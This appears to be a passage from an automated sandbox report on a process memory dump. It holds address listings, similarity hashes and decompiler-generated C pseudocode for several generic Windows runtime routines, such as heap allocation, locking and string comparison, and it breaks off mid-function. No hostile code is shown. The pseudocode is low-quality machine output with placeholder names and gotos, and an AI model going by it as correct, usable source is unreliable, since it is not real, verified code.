0x00f87a2b
0x00f87a2e
0x00f87a30
0x00f87bea
0x00f87bea
0x00000000
0x00f87bea
0x00f87a36
0x00f87a43
0x00f87a48
0x00f87a4c
0x00f87a4e
0x00000000
0x00000000
0x00f87a58
0x00f87a5a
0x00f87a5b
0x00f87a5c
0x00f87a5d
0x00f87a63
0x00f87a64
0x00f87a6a
0x00f87a6c
0x00f87a6e
0x00f879cb
0x00f879cb
0x00f879ce
0x00f879d0
0x00f87a98
0x00f87a9b
0x00f87a9b
0x00f87a9e
0x00f87aa1
0x00f87bbe
0x00f87bbe
0x00f87bc0
0x00f87be0
0x00f87be0
0x00f87a01
0x00f87a01
0x00f87a05
0x00f87a07
0x00f87a15
0x00f87a15
0x00f87a1a
0x00000000
0x00f87a1a
0x00f87bc2
0x00f87bc6
0x00f87bc9
0x00f87bcd
0x00f87bcf
0x00f879e6
0x00f879e6
0x00f879eb
0x00f879eb
0x00f879ef
0x00f879f1
0x00000000
0x00000000
0x00f879f3
0x00f879f5
0x00f879ff
0x00f879ff
0x00000000
0x00f879ff
0x00f879f7
0x00f879fd
0x00000000
0x00000000
0x00000000
0x00f879fd
0x00f87bd5
0x00f87bd8
0x00000000
0x00000000
0x00f87ba9
0x00f87bac
0x00f87bb0
0x00f87bb1
0x00f87bb1
0x00f87bb6
0x00000000
0x00f87bb6
0x00f87aa7
0x00f87aaa
0x00000000
0x00000000
0x00f87ab2
0x00f87ab3
0x00f87ab5
0x00f87aec
0x00f87aef
0x00f87b25
0x00f87b28
0x00f87b62
0x00f87b64
0x00f87b8f
0x00f87b92
0x00f87b96
0x00f87b98
0x00000000
0x00000000
0x00f87b9e
0x00f87b9f
0x00f87ba3
0x00000000
0x00f87ba3
0x00f87b66
0x00f87b68
0x00f87ae2
0x00f87ae2
0x00000000
0x00f87ae2
0x00f87b6e
0x00f87b72
0x00f87b75
0x00f87b81
0x00f87b85
0x00f87b87
0x00000000
0x00000000
0x00f87b31
0x00f87b34
0x00f87b3c
0x00f87b45
0x00f87b46
0x00f87b4f
0x00f87b51
0x00f87b57
0x00f87b59
0x00f87b59
0x00000000
0x00f87b59
0x00f87b77
0x00000000
0x00f87b77
0x00f87b2a
0x00000000
0x00f87b2a
0x00f87af1
0x00f87af3
0x00000000
0x00000000
0x00f87afb
0x00f87afc
0x00f87afe
0x00000000
0x00000000
0x00f87b00
0x00f87b03
0x00000000
0x00000000
0x00f87b05
0x00f87b09
0x00f87b0d
0x00f87b0f
0x00000000
0x00000000
0x00f87b18
0x00f87b1d
0x00000000
0x00f87b1d
0x00f87ab7
0x00f87ab9
0x00000000
0x00000000
0x00f87abf
0x00f87ac1
0x00000000
0x00000000
0x00f87ac3
0x00f87ac6
0x00000000
0x00000000
0x00f87ac8
0x00f87acc
0x00f87ad0
0x00f87ad2
0x00000000
0x00000000
0x00f87adb
0x00000000
0x00f87adb
0x00f879d6
0x00f879d9
0x00f879dc
0x00f87a91
0x00f87a94
0x00000000
0x00f87a94
0x00f879e2
0x00000000
0x00f879e2
0x00f87a74
0x00f87a7a
0x00000000
0x00000000
0x00f87a8a
0x00f87a21
0x00f87a21
0x00000000
0x00f87a21
0x00f1c650
0x00f1c651
0x00f1c656
0x00f1c65c
0x00f1c65d
0x00f1c663
0x00f1c664
0x00f1c66a
0x00f1c66e
0x00f879c5
0x00f879c7
0x00000000
0x00f879c7
0x00f1c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01c468b7ef8c1599acca1919eb1bb129499cdfb42115c6cc51d6a0e60768021
Instruction ID: ae71d7e2c6a617e4da6421916137b21e4446acebac4f4e0de368de43cda7e5ea
Opcode Fuzzy Hash: b01c468b7ef8c1599acca1919eb1bb129499cdfb42115c6cc51d6a0e60768021
Instruction Fuzzy Hash: 53819276A483018BCB25FE14C881BAEB3A5FB84364F34486AFD459B255D334ED44EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00FAB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1007b9c; // 0x0
				_t124 = L00F34620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00F59800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E00F595B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00F595D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00F377F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00F59910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00F595D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1007b9c; // 0x0
									_t92 = L00F34620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00F59910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00F1A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E00FAE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E00FAE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E00F595B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x00fab8d9
0x00fab8e4
0x00000000
0x00fab8e6
0x00fab8f3
0x00fab8f5
0x00fab8f5
0x00fab8f8
0x00fab920
0x00fab924
0x00fab936
0x00fab939
0x00fab93d
0x00fab948
0x00fab9a0
0x00fab9a0
0x00fab9a4
0x00fab9bf
0x00fab9c4
0x00fab9c6
0x00fab9cd
0x00fab9d1
0x00fabad4
0x00fabad8
0x00fabada
0x00fabadc
0x00fabadc
0x00fabadf
0x00fabae0
0x00fabae2
0x00fabae4
0x00fabaec
0x00fabaee
0x00fabaf0
0x00fabaf0
0x00fabaec
0x00fabafb
0x00fabafc
0x00fabafe
0x00fabb01
0x00fabb01
0x00000000
0x00fabb06
0x00fab9d7
0x00fab9db
0x00fab9db
0x00fab9de
0x00fab9de
0x00fab9e4
0x00fab9e7
0x00fab9ea
0x00fab9ec
0x00fab9ef
0x00fab9f3
0x00faba1b
0x00faba1b
0x00faba23
0x00faba24
0x00faba27
0x00faba2a
0x00faba2b
0x00faba2e
0x00faba30
0x00faba37
0x00faba3f
0x00faba9c
0x00fabaa2
0x00fabb13
0x00fabb15
0x00fabaae
0x00fabaae
0x00fabab3
0x00fabab5
0x00fababa
0x00fabac8
0x00fabac8
0x00fababa
0x00fabacd
0x00fabacf
0x00000000
0x00fabacf
0x00fabb1a
0x00000000
0x00fabb1c
0x00fabaa7
0x00fabb11
0x00000000
0x00fabb11
0x00fabaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x00faba41
0x00faba41
0x00faba41
0x00faba58
0x00faba5d
0x00faba62
0x00000000
0x00000000
0x00faba64
0x00faba67
0x00faba68
0x00faba69
0x00faba6c
0x00faba6f
0x00faba71
0x00faba78
0x00faba80
0x00000000
0x00000000
0x00faba90
0x00faba90
0x00faba97
0x00000000
0x00faba97
0x00fab9f5
0x00fab9f7
0x00fab9f7
0x00fab9fa
0x00faba03
0x00faba07
0x00faba0c
0x00faba10
0x00faba17
0x00000000
0x00fab9f7
0x00fab9a6
0x00fab9a8
0x00fab9af
0x00fab9b3
0x00000000
0x00000000
0x00fab9b9
0x00000000
0x00fab9b9
0x00fab94d
0x00fab98f
0x00fab995
0x00fab999
0x00fab960
0x00fab967
0x00fab968
0x00fab96a
0x00000000
0x00fab96a
0x00fab99b
0x00fab99e
0x00000000
0x00000000
0x00000000
0x00fab99e
0x00fab951
0x00fab954
0x00fab95a
0x00fab95e
0x00fab972
0x00fab979
0x00fab97d
0x00fab97f
0x00fab980
0x00fab982
0x00fab984
0x00000000
0x00fab984
0x00000000
0x00fab926
0x00000000
0x00fab926

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1bd562ee1bd3337485de377a67acfdb1c025ef2d1242200c0b3f2f7e274d9a
Instruction ID: 477d45e909d8044e4df0374e6199cb83e046797a737db82010702318edf1b4b1
Opcode Fuzzy Hash: bb1bd562ee1bd3337485de377a67acfdb1c025ef2d1242200c0b3f2f7e274d9a
Instruction Fuzzy Hash: 327130B2600B01EFD7328F24CC41F56BBE5EF46720F244528EA55872E2DB79E940EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F152A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F152A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00F2EEF0(0x10079a0);
					_t104 =  *0x1008210; // 0xaa2ca0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00F2EB70(_t93, 0x10079a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00F59890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00F2EEF0(0x10079a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00F2EB70(0, 0x10079a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xaa2cad
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00F4F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00F2EEF0(0x10079a0);
									__eflags =  *0x1008210 - _t104; // 0xaa2ca0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1008210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00F94888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00F2EB70(_t95, 0x10079a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00F595D0();
											L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00F595D0();
											L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00F2EB70(_t93, 0x10079a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00F595D0();
										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00F595D0();
										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00F4F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x00f152a5
0x00f152ad
0x00f152b0
0x00f152b3
0x00f152b7
0x00f152ba
0x00f152bf
0x00f152c4
0x00f152cc
0x00000000
0x00000000
0x00f152ce
0x00f152d9
0x00f152dd
0x00f152e7
0x00f152f7
0x00f152f9
0x00f152fd
0x00f70dcf
0x00f70dd5
0x00f70dd6
0x00f70dd7
0x00f70dd8
0x00f70dd9
0x00f70dde
0x00f70ddf
0x00f70de0
0x00f70de1
0x00f70de2
0x00f70de5
0x00f70dea
0x00f70dec
0x00f70f60
0x00f70f64
0x00f70f70
0x00f70f76
0x00f70f79
0x00f70f79
0x00000000
0x00f70f64
0x00f70df2
0x00f70df7
0x00f70e04
0x00f70e0d
0x00f70e0d
0x00f70e10
0x00f70e1a
0x00f70e1c
0x00f70e4c
0x00f70e52
0x00f70e61
0x00f70e67
0x00f70e6b
0x00f70e70
0x00f70e76
0x00f70ed7
0x00f70edc
0x00f70ee0
0x00f70ee6
0x00f70eea
0x00f70eed
0x00f70ef0
0x00f70ef3
0x00f70ef6
0x00f70ef9
0x00f70efe
0x00f70f01
0x00f70f01
0x00f70f0b
0x00f70f12
0x00f70f16
0x00f70f18
0x00f70f1b
0x00f70f2c
0x00f70f31
0x00f70f31
0x00f70f35
0x00f70f39
0x00f70f3a
0x00f70f3c
0x00f70f3f
0x00f70f50
0x00f70f55
0x00f70f55
0x00f70f59
0x00f152eb
0x00f152f1
0x00f152f1
0x00f70e7d
0x00f70e84
0x00f70e88
0x00f70e8a
0x00f70e8d
0x00f70e9e
0x00f70ea3
0x00f70ea3
0x00f70ea7
0x00f70eaf
0x00f70eb3
0x00f70eb9
0x00f70eb9
0x00f70ebc
0x00f70ecd
0x00f70ecd
0x00000000
0x00f70eb3
0x00f70e21
0x00f70e2b
0x00f70e2f
0x00f70e30
0x00f70e3a
0x00f70e3f
0x00f70e41
0x00000000
0x00000000
0x00f70e47
0x00000000
0x00f70e47
0x00f70df9
0x00f70dfe
0x00000000
0x00000000
0x00000000
0x00f70dfe
0x00f15303
0x00f15307
0x00000000
0x00f15309
0x00000000
0x00f15309
0x00f15307
0x00f152e9
0x00f152e9
0x00000000
0x00f152e9
0x00f1530e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c8a9b86f55df1ddc2242e9ac5b045d2b3119d6527d176b957e2453c2483ef7
Instruction ID: 223e9581866cfb8bb376287e37635fb5f3e19ef5f20502c4978696788465a1d6
Opcode Fuzzy Hash: 36c8a9b86f55df1ddc2242e9ac5b045d2b3119d6527d176b957e2453c2483ef7
Instruction Fuzzy Hash: 0251BB72204781EBD7219F64C841B66BBA4FF90B20F14491EF49987652EB78E844E792

Uniqueness

Uniqueness Score: -1.00%

Function 00F42AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F42AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1008204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1008208; // 0x1008207
				_t8 = _t57 + 0x1008208; // 0x1008207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1008450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x100821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1006d5c; // 0x7f610654
							_t72 =  *0x1006d5c; // 0x7f610654
							_t75 =  *0x1006d5c; // 0x7f610654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1006d5c; // 0x7f610654
							_t84 =  *0x1006d5c; // 0x7f610654
							_t87 =  *0x1006d5c; // 0x7f610654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00F5F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x00f42ae4
0x00f42aec
0x00f42aef
0x00f42af4
0x00f42af7
0x00f42afd
0x00f42b92
0x00f42b92
0x00f42b97
0x00f42b9c
0x00f42b9c
0x00f42b03
0x00f42b06
0x00f42b09
0x00f42b09
0x00f42b0f
0x00f42b15
0x00f42b15
0x00f42b1b
0x00f42b1e
0x00f42b21
0x00f42b26
0x00f42b29
0x00f42b81
0x00f42b84
0x00f42c0e
0x00f42c15
0x00f42c24
0x00f42c24
0x00f42b8a
0x00f42b8a
0x00f42b8a
0x00f42b8a
0x00f42b90
0x00000000
0x00000000
0x00000000
0x00000000
0x00f42b4a
0x00f42b4a
0x00f42b4d
0x00f42b53
0x00000000
0x00000000
0x00f42b55
0x00f42b58
0x00f42bb7
0x00f85d1b
0x00f85d37
0x00f85d47
0x00f85d53
0x00f42bbd
0x00f42bbd
0x00f42bbd
0x00f42bb7
0x00f42b5d
0x00f42c2f
0x00f85d5b
0x00f85d77
0x00f85d87
0x00f85d93
0x00f42c35
0x00f42c35
0x00f42c35
0x00f42c2f
0x00f42b65
0x00f42b9f
0x00f42ba2
0x00f42b67
0x00f42b67
0x00f42b69
0x00f42b6b
0x00f42b6e
0x00f42bc9
0x00f42bcc
0x00f42bcf
0x00f42bd4
0x00f42bd6
0x00f42bd6
0x00f42bdb
0x00f42c02
0x00f42c05
0x00f42c07
0x00000000
0x00f42c07
0x00f42be0
0x00f42c00
0x00f42c3f
0x00f42c3f
0x00000000
0x00f42c00
0x00f42be5
0x00f42be7
0x00f42bec
0x00f42bf4
0x00f42bf6
0x00000000
0x00f42bf6
0x00f42b70
0x00f42b76
0x00f42b2b
0x00f42b2b
0x00f42b2d
0x00f42b2f
0x00f42b32
0x00f42b35
0x00f42b3a
0x00000000
0x00f42b40
0x00f42b43
0x00f42b45
0x00f42b47
0x00f42b4a
0x00f42b4d
0x00f42b53
0x00000000
0x00000000
0x00000000
0x00f42b53
0x00f42b78
0x00f42b78
0x00f42b7b
0x00f42b7e
0x00000000
0x00f42b7e
0x00f42b76
0x00f42ba5
0x00f42ba5
0x00f42ba8
0x00f42bad
0x00000000
0x00000000
0x00f42baf
0x00f42baf
0x00f42bc2
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902eb653e8a65848a08afc0b0822623f4ac60eaafe0c8da76c8295b1155a2147
Instruction ID: 44c352a8c33c668662a045bd912b2f69254b6f9ed5a225237cb9cb31689c31d4
Opcode Fuzzy Hash: 902eb653e8a65848a08afc0b0822623f4ac60eaafe0c8da76c8295b1155a2147
Instruction Fuzzy Hash: 2351BE76E005158FCB54DF1CC8809BDBBB2FBC8700B55846AFC869B315D735AA91EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F3DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00F3DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
